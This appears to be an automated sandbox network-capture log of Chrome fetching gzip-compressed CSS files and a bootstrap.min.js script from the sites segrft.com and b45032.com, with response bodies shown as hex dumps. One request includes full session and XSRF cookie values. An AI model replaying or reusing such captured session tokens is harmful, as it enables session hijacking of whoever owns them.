                                                      2025-01-12 23:47:42 UTC3806INData Raw: 32 33 39 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 3d 69 73 ea 48 92 df e7 57 b0 dd d1 1d dd e3 27 1b c4 61 63 c7 db 0d b0 cd e1 0b 1b db 5c 5f 26 04 92 40 46 48 42 12 97 1d f3 df 37 eb 92 4a 52 95 f0 9b 5d 1c fd 1a 95 2a b3 f2 ae ac 93 b3 7f fe 57 e1 e3 65 63 f8 87 c2 7b b7 a0 14 b6 a5 d3 92 7a 5a 82 6f 6a b1 54 53 8a 75 a5 54 f9 c7 3f 0b 8b 30 f4 2e cf ce 3e d6 a8 e6 c6 3a 9d b9 2b 28 ed 3a 33 7b a3 1b c1 65 61 e6 fa c6 e9 2c 08 7e 14 b4 19 7c d7 2d d7 a1 8f 9b d0 85 ca 9e 6d 84 b4 c2 ca 70 36 e4 dd 74 13 86 ac de cc 75 42 df b5 e7 be bb f1 c8 db d9 c2 98 2d a7 ee de d7 00 1b 29 d2 b5 d0 f0 ac d9 d2 f0 e9 b3 a5 d9 ee 9c 7e f7 b5 f9 5c 9b da b4 15 df 08 ac cf f8 d1 f3 dd 39 14 05 53 8d 82 06 86 6d cc c2 b8 02 79 8e 69 0b 6c 4b 67 cd 04 ae cf d7 f4 2c c7
                                                      Data Ascii: 239c=isHW'ac\_&@FHB7JR]*Wec{zZojTSuT?0.>:+(:3{ea,~|-mp6tuB-)~\9SmyilKg,
                                                      2025-01-12 23:47:42 UTC4096INData Raw: 17 ab ad 41 eb e9 e6 65 d0 6c 3d 5a 95 5d 63 87 37 44 2c 4e 5e 5e ee f0 86 89 eb 1d ae 8e 61 1b 8d eb e5 78 f7 b4 1e f9 fa 75 55 bd 79 2d d6 b4 f3 c7 d6 a4 7b 52 69 75 9a d7 f7 ee 8d 31 bc 1f ad 0f ab e7 75 7b bd df de f9 a3 c9 f4 71 7f fe 16 ce 4e 76 f5 d1 fc 5d 6d 35 cb 76 ef f0 d2 1f de be a9 dd 56 db 7a af af 4a a6 7f 33 f0 f6 93 c9 ac 36 35 3b bb 6d 65 56 1a 8f 9e 6b cb d2 40 3f a8 75 b5 35 ad bd 2f 37 db 56 38 f2 b6 c3 d7 cf c6 49 e7 30 1b dd 75 de 47 56 7b dc b5 1e e7 6a bf 36 ac 54 eb 73 67 d8 36 3b 4f fa 47 77 7d 33 1c ac 8d 55 47 35 96 5e 6f 0a ff d9 9e 37 7c 5f 4f ac b5 5f 33 f4 f5 7a f8 d2 68 74 cd e5 ed f5 0b f0 f9 d2 08 30 73 d7 f3 06 f0 d7 68 78 af 8f f3 89 d3 36 b5 f5 6c 5e ba 55 37 9b cf 9b d5 aa f3 de ec 5f bc 58 76 bd ba b0 9e ef d7 43
                                                      Data Ascii: Ael=Z]c7D,N^^axuUy-{Riu1u{qNv]m5vVzJ365;meVk@?u5/7V8I0uGV{j6Tsg6;OGw}3UG5^o7|_O_3zht0shx6l^U7_XvC
                                                      2025-01-12 23:47:42 UTC1227INData Raw: 80 98 68 12 c0 31 76 3b d8 05 25 1c a4 10 a3 4c d6 f7 0d 2c 34 31 00 62 37 cd 47 b0 d8 98 26 ba 49 3a 5a cb 89 77 ad 61 96 d3 00 21 6c 28 0a 4c 74 b3 b0 c4 c5 15 62 81 49 ba 18 14 89 0e 52 50 6a 83 49 58 13 ee 71 81 f6 60 26 1f 5f d9 0c 17 b7 08 68 05 05 a1 76 63 05 51 28 bc 25 53 04 40 f5 93 04 d2 e1 aa 54 d8 a9 0a 57 ae 09 9a c0 29 4d ba 19 06 a1 4c c5 30 44 49 c9 56 d0 5d 91 e2 da 44 43 c9 da 2b cd b2 c9 99 6f 31 e7 54 4b 02 20 39 ef a8 72 9a 93 60 63 85 33 b8 2a 57 4c 19 d5 4c b2 15 f8 45 1f b9 b4 68 50 48 42 c0 5e e5 00 2e a0 16 8a 97 86 82 14 80 0f f7 58 4b ea 13 ff 4f d6 07 43 0b 16 92 fa c4 e9 93 f5 d1 d5 d7 70 8f b6 98 20 92 39 27 01 36 4e 1e 08 ed 97 93 20 53 d7 5d c2 74 ba c4 ed 69 6f 9c 04 09 65 51 85 76 bf c9 da 0b 77 25 56 1b 78 05 56 1c e7
                                                      Data Ascii: h1v;%L,41b7G&I:Zwa!l(LtbIRPjIXq`&_hvcQ(%S@TW)ML0DIV]DC+o1TK 9r`c3*WLLEhPHB^.XKOCp 9'6N S]tioeQvw%VxV


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.44974920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:41 UTC571OUTGET /plus/plugin/css/swiper.min.css?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:42 UTC290INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:42 GMT
                                                      Content-Type: text/css
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: W/"5fc5abd9-4bef"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      2025-01-12 23:47:42 UTC3643INData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 1c 6b 6f e3 b8 f1 fb fd 0a e1 8a 60 e3 3b d3 91 65 27 9b 95 d1 c3 5d ef ba 40 db bd 2f 6d 51 b4 1f 69 8b b6 79 91 25 43 92 e3 24 c6 fe f7 ce f0 25 4a 22 6d 39 8f 62 8b db 7b c4 32 39 9c 19 0e 87 c3 99 e1 c8 57 df 7d f7 4d f0 5d f0 8f 3d df b2 22 98 8e c6 a3 10 bf ff 9a 97 55 b0 c9 13 56 64 f0 31 e7 29 0b aa 7c b7 58 07 65 ca a1 31 a0 59 12 2c 0b ba 61 fb bc b8 0b f6 bc 5a 07 6b 5a 24 7b 5a b0 80 2e 16 2c 65 05 ad 58 12 54 05 cd 4a 5e f1 3c 2b 11 ed ba aa b6 f1 d5 d5 7e bf 1f f1 84 66 2b 56 e4 a3 5d 79 55 0a ea 57 00 81 40 3f e7 db c7 82 af d6 55 10 85 e3 29 81 3f b7 c1 bf 52 9a f0 0d 2f 82 bf 01 99 94 6e b6 3c e1 0a fc ef 40 8c 96 40 6b 97 21 67 d5 9a 05 bf fe e5 9f c1 27 be 60 59 c9 da 40 79 16 07 7f a5 d9
                                                      Data Ascii: e2fko`;e']@/mQiy%C$%J"m9b{29W}M]="UVd1)|Xe1Y,aZkZ${Z.,eXTJ^<+~f+V]yUW@?U)?R/n<@@k!g'`Y@y


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.44975020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:41 UTC566OUTGET /plus/css/common/index.css?ver=1700473959 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:42 UTC326INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:42 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 2034
                                                      Connection: close
                                                      Cteonnt-Length: 6749
                                                      Last-Modified: Mon, 20 Nov 2023 09:52:39 GMT
                                                      ETag: "655b2c67-1a5d"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:42 UTC2034INData Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 58 ef 6e db 36 10 ff 9e a7 e0 6a 14 48 0a cb 91 64 c9 76 5c 60 58 d3 b5 e8 87 02 1b b6 07 08 68 89 b6 b9 c8 a2 20 d1 49 da a2 1f f7 65 df f6 1e 7b ad be c7 8e 3c 92 12 25 d9 4b b1 14 2d 9a 23 ef ff dd ef 8e ba 7e c5 cb 9c 3d bd ba be f8 29 db d3 ba 61 92 bc 38 ca 6d b0 7a f1 fa 62 23 f2 4f 5f 2e 08 fc 5c bf 22 1b 9a dd ef 6a 71 2c f3 35 99 84 e1 f2 36 bd 25 c7 ba b8 bc e6 07 ba 63 cd 5d 55 1c 9b 6b 2d eb 5a f1 05 9b dd 6c c7 b7 57 a4 66 15 a3 32 78 7a 4d 40 87 92 e5 09 8a 92 55 98 be 7b ad 0f b6 a2 94 41 c3 3f b3 35 89 e2 ea e9 f5 c5 d7 8b 99 16 f8 81 d1 9c a0 21 7b c6 77 7b b9 26 cb 48 5d d0 e2 44 9d b3 3a 28 d8 16 c8 40 25 8d 28 78 4e 26 49 4a d3 d5 8d 77 a7 46 de f3 97 36 42 4a 71 38 7d ab 63 7d bd db 5c 2e a7 51 1c 4f
                                                      Data Ascii: Xn6jHdv\`Xh Ie{<%K-#~=)a8mzb#O_.\"jq,56%c]Uk-ZlWf2xzM@U{A?5!{w{&H]D:(@%(xN&IJwF6BJq8}c}\.QO


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.44975620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:43 UTC579OUTGET /plus/css/unite/prizedraw_pop_unite.css?ver=1733883988 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:43 UTC326INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:43 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 1703
                                                      Connection: close
                                                      Cteonnt-Length: 6938
                                                      Last-Modified: Wed, 11 Dec 2024 02:26:28 GMT
                                                      ETag: "6758f854-1b1a"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:43 UTC1703INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 58 6f 6f db 44 18 7f df 4f 71 5a 35 25 1d 71 ea b8 e9 da 3a 42 30 a4 a1 22 21 98 40 8c 97 d5 25 be 24 a7 3a 76 70 ae 49 69 84 04 9a 36 36 75 30 de b4 68 1a 1a 08 98 18 93 26 31 40 63 52 91 f6 5d 50 93 6e af f8 0a bb ff 76 6c c7 75 b2 ae 2f d6 3b 3f f7 3c bf fb 3d 7f af 6f 37 da 30 e8 21 02 ce ed 90 a6 b1 7e ae b6 50 0e 70 ab 4d b6 de c7 de f6 3b fe 2e 18 76 fd 1e 26 d8 f7 6c d0 c4 bb c8 a9 11 bf 6b 9b 35 2e 44 ff df 33 b0 e7 a0 5d 1b 6c d0 7f b5 2f e2 a7 cb 75 e2 19 0d d7 ef a1 a1 83 7b 5d 17 7e 6e 83 ba eb 37 b6 6b 03 ec 90 b6 0d 2a 6b dd dd 5a 1b 71 6d 62 11 da 83 f5 9e ef ee 10 24 8d 59 f4 a3 30 3e 69 b4 0e 1b db ad c0 df f1 1c 7b d1 34 cd 1a a8 fb 81 83 02 23 80 0e de e9 d9 60 d5 3c cf f6 76 8d 1e de c3 5e 8b 02 10 df
                                                      Data Ascii: XooDOqZ5%q:B0"!@%$:vpIi66u0h&1@cR]Pnvlu/;?<=o70!~PpM;.v&lk5.D3]l/u{]~n7k*kZqmb$Y0>i{4#`<v^


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.44975720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:43 UTC581OUTGET /plus/css/custom/prizedraw_pop_custom.css?ver=1663905027 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:43 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:43 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 38
                                                      Connection: close
                                                      Cteonnt-Length: 18
                                                      Last-Modified: Fri, 23 Sep 2022 03:50:27 GMT
                                                      ETag: "632d2d03-12"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:43 UTC38INData Raw: 1f 8b 08 00 00 00 00 00 00 03 73 48 ce 48 2c 2a 4e 2d 51 50 2a 2d 49 d3 b5 50 b2 e6 02 00 82 e3 4b 94 12 00 00 00
                                                      Data Ascii: sHH,*N-QP*-IPK


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.44975520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:43 UTC571OUTGET /plus/css/unite/float_unite.css?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:43 UTC323INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:43 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 272
                                                      Connection: close
                                                      Cteonnt-Length: 725
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-2d5"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:43 UTC272INData Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 91 41 6e c3 20 10 45 f7 3e 05 cb 76 81 e5 44 ca 86 ec 73 8d 0a 1b 62 46 1d 0f 16 c6 a9 d3 aa 77 2f 18 bb 76 9d 54 aa 54 85 1d 1f e6 cd 3c c8 5d 7f 42 2b 3d fb c8 58 58 ad ed c0 83 25 c1 64 d9 59 ec bd 3e 8e 79 d5 bb ce 3a 11 ce 81 bc 76 29 7c e7 40 4a 0f 82 ed 8a a2 48 d1 39 b2 04 73 50 1b 9f 12 6f 5b c1 f6 87 a2 1d d2 de 5e b4 0b b7 de 04 33 a0 94 a6 63 f6 99 65 f9 3c 45 3e 02 5e 1a 4d 7d 1a e8 0e 50 0f 9e 4b 84 3a 0c b9 8a 1b e9 6a 20 8e fa 1c ae 1f 62 b7 c8 c5 47 d8 c5 1e d3 2c 7f 92 9b 87 f8 4d 6e c5 5b b9 2d e9 a4 36 ca ae dc 16 1a 93 89 a7 a0 6b 51 5e 05 03 42 20 cd 4b b4 d5 6b 62 2c ea 4e a3 f4 70 09 ea 5b 08 83 a6 16 e4 0d af 0c a0 7a da 3f 6f a8 64 e9 4e 95 30 d1 7a 53 bb fb 47 ed 4d df 9f 36 81 51 5a 75 9d be 74
                                                      Data Ascii: An E>vDsbFw/vTT<]B+=XX%dY>y:v)|@JH9sPo[^3ce<E>^M}PK:j bG,Mn[-6kQ^B Kkb,Np[z?odN0zSGM6QZut


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.44975920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:43 UTC575OUTGET /plus/css/custom/float_customer.css?ver=1606988918 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:43 UTC324INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:43 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 396
                                                      Connection: close
                                                      Cteonnt-Length: 1255
                                                      Last-Modified: Thu, 03 Dec 2020 09:48:38 GMT
                                                      ETag: "5fc8b476-4e7"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:43 UTC396INData Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 94 df 6e 83 20 18 c5 ef 7d 0a 76 6b 82 ff 6a d3 85 de ef 35 16 5a 69 25 41 30 f0 d9 9a 2d 7b f7 81 a0 b5 b6 5b ba 5e cc 3b 0e 72 fc 9d 8f 13 d3 58 f3 63 0d 71 1a 45 89 ee de 84 a2 80 3e 23 64 1f c1 0e 40 56 af 6d bf 1d 96 ea c4 f4 41 a8 33 41 27 6e f8 4e b0 6d f4 75 39 92 d8 2d 0a ef 0d 93 9d 3f 3d ac 09 ea a4 61 e0 0d 80 f5 80 a9 e0 47 79 25 0b 2e 19 ae 99 83 20 28 9b 9b 92 da 7d 73 6e 1d c8 1a aa 8f 5c e2 01 10 e1 7c 35 22 06 1d 54 6b e5 d2 a9 d6 cc f0 8a ed a8 c6 43 cc a4 b1 96 c1 c5 bd 56 64 59 db bf f0 a6 55 1a a8 0c 44 1f 98 cb 8a f5 04 e5 85 17 5a 65 38 70 65 b9 e9 ce 28 d1 81 cd ee f4 7d a7 8d d2 c4 ee 73 09 4c 7b 31 8d 41 53 39 1e c8 92 b5 d9 da e1 ba 9d 81 60 c8 e8 56 67 5e 41 4d 50 79 97 13 4d 83 a5 4e 9f 8d 80
                                                      Data Ascii: n }vkj5Zi%A0-{[^;rXcqE>#d@VmA3A'nNmu9-?=aGy%. (}sn\|5"TkCVdYUDZe8pe(}sL{1AS9`Vg^AMPyMN


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.44975820.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:43 UTC577OUTGET /plus/css/unite/login_modal_unite.css?ver=1726133380 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:43 UTC326INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:43 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 2005
                                                      Connection: close
                                                      Cteonnt-Length: 6977
                                                      Last-Modified: Thu, 12 Sep 2024 09:29:40 GMT
                                                      ETag: "66e2b484-1b41"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:43 UTC2005INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 58 5b 6f 1b 45 14 7e 6e 7e c5 d0 50 35 09 59 c7 76 9c 26 d8 6a 45 a1 42 f0 80 c4 03 08 21 84 a2 f1 ee ac 3d 74 77 67 b5 b3 8e d3 5a 95 40 a2 a2 55 90 fa 82 ca a5 95 40 88 3b 28 88 17 68 4b 05 7f a6 4e c8 13 7f 81 33 67 c6 eb dd f5 6e bc 69 11 22 69 52 e7 cc cc b9 7c e7 3a f3 9c dd a7 91 64 31 39 fd fa 6b 2f 5a 5b a7 3b 0b 8b 9e e8 f1 60 db 17 0e f5 b6 07 01 8f 19 59 19 11 57 04 b1 e5 52 9f 7b 57 da e4 ec 2b dc 8e 84 14 6e 4c de a4 2f 31 7e 76 f5 62 c4 a9 d7 21 d7 16 16 d6 56 1e fd b9 7f f0 d1 fd a3 2f df ff 6b ff 8f 83 2f 7e 1b 3f bc b5 b2 b6 50 8b c5 76 57 88 58 c6 11 0d 49 81 8c 1a fe 61 d9 20 87 05 f1 48 ec b0 c8 f5 c4 b0 dd e7 8e c3 82 0e e9 8a c8 61 51 9b 34 c2 5d 22 85 c7 1d b2 43 a3 25 cb 42 4e af 58 61 c4 7d 1a 5d
                                                      Data Ascii: X[oE~n~P5Yv&jEB!=twgZ@U@;(hKN3gni"iR|:d19k/Z[;`YWR{W+nL/1~vb!V/k/~?PvWXIa HaQ4]"C%BNXa}]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.44976020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:43 UTC579OUTGET /plus/css/custom/login_modal_custom.css?ver=1726649910 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:43 UTC324INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:43 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 823
                                                      Connection: close
                                                      Cteonnt-Length: 2599
                                                      Last-Modified: Wed, 18 Sep 2024 08:58:30 GMT
                                                      ETag: "66ea9636-a27"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:43 UTC823INData Raw: 1f 8b 08 00 00 00 00 00 00 03 9d 56 cd 6e d3 40 10 be e7 29 16 55 48 50 75 53 27 6d 93 d6 bd 72 80 03 12 37 8e d1 da de 3a ab ae 77 ac f5 ba 4d 5b f5 c4 0d ee 1c 00 09 89 27 e0 01 e0 71 ca cf 5b 30 de 1f c7 09 69 eb 36 52 24 7b bc fe e6 9b 99 6f 66 3c 34 30 4b 00 4c 65 34 2b c9 96 84 5c a8 59 01 19 93 b3 5a 09 c3 c9 50 81 e1 78 64 41 ae 06 04 7f 99 a8 4a c9 2e 62 92 48 48 4f 8f ad 4d 0a c5 e9 9c 8b 7c 6e 62 32 1e 97 0b 67 2e 59 96 09 95 53 03 25 9a a3 60 36 7c 61 28 93 22 57 31 49 b9 32 5c 3b 7b 0a 12 74 4c b6 8e ec cf d9 4e 40 19 7a ee 91 27 51 74 3c b8 1e 0c 86 f7 72 b6 37 34 c5 97 11 df 13 3f 17 99 99 c7 64 1a b5 44 12 d0 19 47 8f 0a 14 ef 5a a8 66 99 a8 ab 98 3c cc 5d 26 18 3e db e8 ed 01 28 73 ce 90 82 47 09 29 99 4c 26 9e 20 4b 4f 73 0d b5 ca 30 3a
                                                      Data Ascii: Vn@)UHPuS'mr7:wM['q[0i6R${of<40KLe4+\YZPxdAJ.bHHOM|nb2g.YS%`6|a("W1I2\;{tLN@z'Qt<r74?dDGZf<]&>(sG)L& KOs0:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.449761154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:43 UTC976OUTGET /plus/plugin/js/bootstrap.min.js?ver=1606790105 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
                                                      2025-01-12 23:47:44 UTC416INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:43 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 37045
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Vary: Accept-Encoding
